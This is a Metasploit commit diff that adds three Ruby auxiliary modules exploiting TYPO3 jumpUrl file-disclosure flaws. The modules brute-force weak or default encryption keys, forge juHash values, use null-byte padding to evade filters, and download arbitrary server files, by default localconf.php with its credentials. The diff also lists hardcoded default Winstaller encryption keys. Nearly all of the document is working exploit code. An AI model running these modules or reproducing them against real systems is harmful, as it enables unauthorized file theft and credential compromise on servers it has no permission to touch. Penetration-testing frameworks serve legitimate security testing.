Add #5364

git-svn-id: file:///home/svn/framework3/trunk@14181 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/admin/http/typo3_sa_2009_001.rb

@@ -0,0 +1,158 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'           => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure',
+			'Version'        => '$Revision$',
+			'Description'    => %q{
+				This module exploits a flaw in TYPO3 encryption ey creation process to allow for
+				file disclosure in the jumpUrl mechanism. This flaw can be used to read any file
+				that the web server user account has access to view.
+			},
+			'References'     =>
+				[
+					['OSVDB', '51536'],
+					['URL', 'http://blog.c22.cc/advisories/typo3-sa-2009-001'],
+					['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/'],
+				],
+			'DisclosureDate' => 'Jan 20 2009',
+			'Author'         => [ 'Chris John Riley' ],
+			'License'        => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptString.new('URI', [true, "TYPO3 Path", "/"]),
+				OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
+				OptString.new('ENC_KEY', [false, "Encryption key if known", '']),
+			], self.class)
+	end
+
+	def enc_key(seed)
+
+		if datastore['ENC_KEY'] != ''
+			final = datastore['ENC_KEY']
+			print_status("Using provided Encryption Key")
+		else
+			# build the encrption key to check
+			seed = seed.to_s()
+			rnd1 = Digest::MD5.hexdigest(seed)
+			rnd2 = Digest::MD5.hexdigest(rnd1)
+			rnd3 = Digest::MD5.hexdigest(rnd1 + rnd2)
+			final = rnd1 + rnd2 + rnd3
+		end
+
+		return final
+	end
+
+	def run
+
+	# Add padding to bypass TYPO3 security filters
+	#
+	# Null byte fixed in PHP 5.3.4
+	#
+
+	case datastore['RFILE']
+	when nil
+		# Nothing
+	when /localconf.php$/i
+		jumpurl = "#{datastore['RFILE']}%00/."
+		jumpurl_len = (jumpurl.length) -2 #Account for difference in length with null byte
+		jumpurl_enc = jumpurl.sub("%00", "\00") #Replace %00 with \00 to correct null byte format
+		print_status("Adding padding to end of #{datastore['RFILE']} to avoid TYPO3 security filters")
+	when /^..(\/|\\)/i
+		print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
+	else
+		jumpurl_len = (datastore['RFILE'].length)
+		jumpurl = "#{datastore['RFILE']}"
+		jumpurl_enc = "#{datastore['RFILE']}"
+	end
+
+	print_status("Establishing a connection to #{rhost}:#{rport}")
+	print_status("Trying to retrieve #{datastore['RFILE']}")
+	print_status("Rotating through possible weak encryption keys")
+
+	for i in (0..1000)
+
+		final = enc_key(i)
+
+		locationData = Rex::Text::rand_text_numeric(1) +'::'+ Rex::Text::rand_text_numeric(2)
+		juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
+		juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\""
+		juarray << ";i:2;s:#{final.length}:\"#{final}\";}"
+
+		juhash = Digest::MD5.hexdigest(juarray)
+		juhash = juhash[0..9] # shortMD5 value for use as juhash
+
+		file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
+		file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
+		vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
+
+		begin
+			file = send_request_raw({
+			'uri'       => file_uri,
+			'method'    => 'GET',
+			'headers'   =>
+				{
+					'Connection' => 'Close',
+				}
+			},25)
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE => e
+			print_error(e.message)
+		end
+
+		case file.headers['Content-Type']
+		when 'text/html'
+			case file.body
+			when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
+				print_error("File #{datastore['RFILE']} does not exist.")
+				print_good("Discovered encryption key : #{final}")
+				return
+			when 'jumpurl Secure: locationData, ' + locationData + ', was not accessible.'
+				print_error("File #{datastore['RFILE']} is not accessible.")
+				print_good("Discovered encryption key : #{final}")
+				return
+			when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
+				print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
+				print_good("Discovered encryption key : #{final}")
+				return
+			end
+		when 'application/octet-stream'
+			addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
+			print_good("Discovered encryption key : #{final}")
+			print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
+			store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_sa_2009_001")
+			return
+		else
+			if datastore['ENC_KEY'] != ''
+				print_error("Encryption Key specified is not correct")
+				return
+			else
+				# Try next encryption key
+			end
+		end
+	end
+
+		print_error("#{rhost}:#{rport} [Typo3-SA-2009-001] Failed to retrieve file #{datastore['RFILE']}")
+
+	end
+
+end

modules/auxiliary/admin/http/typo3_sa_2010_020.rb

@@ -0,0 +1,142 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'thread'
+
+class Metasploit4 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'           => 'TYPO3 sa-2010-020 Remote File Disclosure',
+			'Version'        => '$Revision$',
+			'Description'    => %q{
+				This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
+				Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.
+				This flaw can be used to read any file that the web server user account has access to view.
+			},
+			'References'     =>
+				[
+					['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020'],
+					['URL', 'http://gregorkopf.de/slides_berlinsides_2010.pdf'],
+				],
+			'Author'         =>
+				[
+					'Chris John Riley',
+					'Gregor Kopf', # Original Discovery
+				],
+			'License'        => MSF_LICENSE
+		)
+
+		register_options(
+			[
+				OptString.new('URI', [true, "TYPO3 Path", "/"]),
+				OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
+				OptInt.new('MAX_TRIES', [true, "Maximum tries", 10000]),
+			], self.class)
+
+	end
+
+	def run
+
+	# Add padding to bypass TYPO3 security filters
+	#
+	# Null byte fixed in PHP 5.3.4
+	#
+
+	case datastore['RFILE']
+	when nil
+		# Nothing
+	when /localconf.php$/i
+		jumpurl = "#{datastore['RFILE']}%00/."
+	when /^..(\/|\\)/i
+		print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
+	else
+		jumpurl = "#{datastore['RFILE']}"
+	end
+
+	print_status("Establishing a connection to #{rhost}:#{rport}")
+	print_status("Trying to retrieve #{datastore['RFILE']}")
+
+	location_base = Rex::Text::rand_text_numeric(1)
+	counter = 0
+
+	queue = []
+	print_status("Creating request queue")
+
+	1.upto(datastore['MAX_TRIES']) do
+		counter = counter +1
+		locationData = "#{location_base}::#{counter}"
+		queue << "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0"
+		if ((counter.to_f/datastore['MAX_TRIES'].to_f)*100.0).to_s =~ /(25|50|75|100).0$/ # Display percentage complete every 25%
+			percentage = (counter.to_f/datastore['MAX_TRIES'].to_f)*100
+			print_status("Queue #{percentage.to_i}% compiled - [#{counter} / #{datastore['MAX_TRIES']}]")
+		end
+
+	end
+
+	print_status("Queue compiled. Beginning requests... grab a coffee!")
+
+	counter = 0
+	queue.each do |check|
+		counter = counter +1
+		check = check.sub("//", "/") # Prevent double // from appearing in uri
+		begin
+
+			file = send_request_raw({
+				'uri'		=> check,
+				'method'	=> 'GET',
+				'headers'	=>
+					{
+						'Connection' => 'Close',
+					}
+				},25)
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE => e
+			print_error(e.message)
+		end
+
+		if ((counter.to_f/queue.length.to_f)*100.0).to_s =~ /\d0.0$/ # Display percentage complete every 10%
+			percentage = (counter.to_f/queue.length.to_f)*100.0
+			print_status("Requests #{percentage.to_i}% complete - [#{counter} / #{queue.length}]")
+		end
+
+		case file.headers['Content-Type']
+		when 'text/html'
+			case file.body
+			when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
+				print_error("File #{datastore['RFILE']} does not exist.")
+				return
+			when /jumpurl Secure: locationData/i
+				print_error("File #{datastore['RFILE']} is not accessible.")
+				return
+			when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
+				print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
+				return
+			end
+		when 'application/octet-stream'
+			addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
+			print_good("Found matching hash")
+			print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
+			store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_sa_2010_020")
+			return
+		end
+	end
+
+	print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}")
+
+	end
+
+end

modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb

@@ -0,0 +1,211 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'           => 'TYPO3 Winstaller default Encryption Keys',
+			'Version'        => '$Revision$',
+			'Description'    => %q{
+				This module exploits known default encryption keys found in the TYPO3 Winstaller.
+				This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be
+				used to read any file that the web server user account has access to view.
+
+				The method used to create the juhash (short MD5 hash) was altered in later versions
+				of Typo3. Use the show actions command to display and select the version of TYPO3 in
+				use (defaults to the older method of juhash creation).
+			},
+			'References'     =>
+				[
+					['URL', 'http://typo3winstaller.sourceforge.net/'],
+				],
+			'Author'         => [ 'Chris John Riley' ],
+			'License'        => MSF_LICENSE,
+			'Actions'        =>
+				[
+					[	'Short_MD5',
+						{
+							'Description' => 'TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0'
+						}
+					],
+					[	'MIME',
+						{
+							'Description' => 'TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 4.4.1 - 4.4.3'
+						}
+					],
+					[	'HMAC_SHA1',
+						{
+							'Description' => 'TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)'
+						}
+					]
+				],
+			'DefaultAction'  => 'Short_MD5'
+		)
+
+		register_options(
+			[
+				Opt::RPORT(8503),
+				OptString.new('URI', [true, "TYPO3 Path", "/"]),
+				OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
+				OptString.new('ENC_KEY', [false, "Encryption key if known", '']),
+			], self.class)
+
+	end
+
+	def run
+
+	# Add padding to bypass TYPO3 security filters
+	#
+	# Null byte fixed in PHP 5.3.4
+	#
+
+	case datastore['RFILE']
+	when nil
+		# Nothing
+	when /localconf.php$/i
+		jumpurl = "#{datastore['RFILE']}%00/."
+		jumpurl_len = (jumpurl.length) -2 #Account for difference in length with null byte
+		jumpurl_enc = jumpurl.sub("%00", "\00") #Replace %00 with \00 to correct null byte format
+		print_status("Adding padding to end of #{datastore['RFILE']} to avoid TYPO3 security filters")
+	when /^..(\/|\\)/i
+		print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
+	else
+		jumpurl_len = (datastore['RFILE'].length)
+		jumpurl = "#{datastore['RFILE']}"
+		jumpurl_enc = "#{datastore['RFILE']}"
+	end
+
+	case action.name
+	when 'Short_MD5'
+		print_status("Performing downloading using Short_MD5 style juHash creation - see show actions for more details")
+	when 'MIME'
+		print_status("Performing downloading using MIME style juHash creation - see show actions for more details")
+	when 'HMAC_SHA1'
+		print_status("Performing downloading using HMAC_SHA1 style juHash creation - see show actions for more details")
+	end
+
+	print_status("Establishing a connection to #{rhost}:#{rport}")
+	print_status("Trying to retrieve #{datastore['RFILE']}")
+
+	if datastore['ENC_KEY'] != ''
+		encryption_keys = [datastore['ENC_KEY']]
+		print_status("Using provided Encryption Key")
+	else
+		print_status("Rotating through known encryption keys")
+		encryption_keys = [
+			#TYPO3 4.3.x - 4.4.x
+			'd696ab49a803d7816021cb1768a6917d',
+			'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
+			'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
+			#TYPO3 4.4.7+
+			'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
+			#TYPO3 4.5.0
+			'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
+			'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
+			#TYPO3 4.5.2
+			'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
+			#TYPO3 4.5.3
+			'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
+			#TYPO3 4.5.4 - 4.5.7
+			'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
+			]
+	end
+
+	counter = 0
+	encryption_keys.each do |enc_key|
+
+		counter = counter +1
+		locationData = Rex::Text::rand_text_numeric(1) +'::'+ Rex::Text::rand_text_numeric(2)
+
+		case action.name
+		when 'Short_MD5'
+			juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
+			juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\""
+			juarray << ";i:2;s:#{enc_key.length}:\"#{enc_key}\";}"
+			juhash = Digest::MD5.hexdigest(juarray)
+			juhash = juhash[0..9] # shortMD5 value for use as juhash
+		when 'MIME'
+			juarray = "a:4:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
+			juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\";i:2;s:0:\"\""
+			juarray << ";i:3;s:#{enc_key.length}:\"#{enc_key}\";}"
+			juhash = Digest::MD5.hexdigest(juarray)
+			juhash = juhash[0..9] # shortMD5 value for use as juhash
+		when 'HMAC_SHA1'
+			juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
+			juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\";i:2;"
+			juarray << "s:0:\"\";}"
+			juhash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new('sha1'), enc_key, juarray)
+		end
+
+		file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
+		file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
+		vprint_status("Checking Encryption Key [#{counter}/#{encryption_keys.length}]: #{enc_key}")
+
+		begin
+			file = send_request_raw({
+			'uri'       => file_uri,
+			'method'    => 'GET',
+			'headers'   =>
+				{
+					'Connection' => 'Close',
+				}
+			},25)
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+			print_error(e.message)
+			return
+		rescue ::Timeout::Error, ::Errno::EPIPE => e
+			print_error(e.message)
+			return
+		end
+
+		case file.headers['Content-Type']
+		when 'text/html'
+			case file.body
+			when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
+				print_error("File #{datastore['RFILE']} does not exist.")
+				print_good("Discovered encryption key : #{enc_key}")
+				return
+			when 'jumpurl Secure: locationData, ' + locationData + ', was not accessible.'
+				print_error("File #{datastore['RFILE']} is not accessible.")
+				print_good("Discovered encryption key : #{enc_key}")
+				return
+			when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
+				print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
+				print_good("Discovered encryption key : #{enc_key}")
+				return
+			end
+		when 'application/octet-stream'
+			addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
+			print_good("Discovered encryption key : #{enc_key}")
+			print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
+			store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_winstaller")
+			return
+		else
+			if datastore['ENC_KEY'] != ""
+				print_error("Encryption Key specified is not correct")
+				return
+			end
+		end
+	end
+
+	print_error("#{rhost}:#{rport} [Typo3] Failed to retrieve file #{datastore['RFILE']}")
+	print_error("Maybe try checking the ACTIONS - Currently using  #{action.name}")
+
+	end
+
+end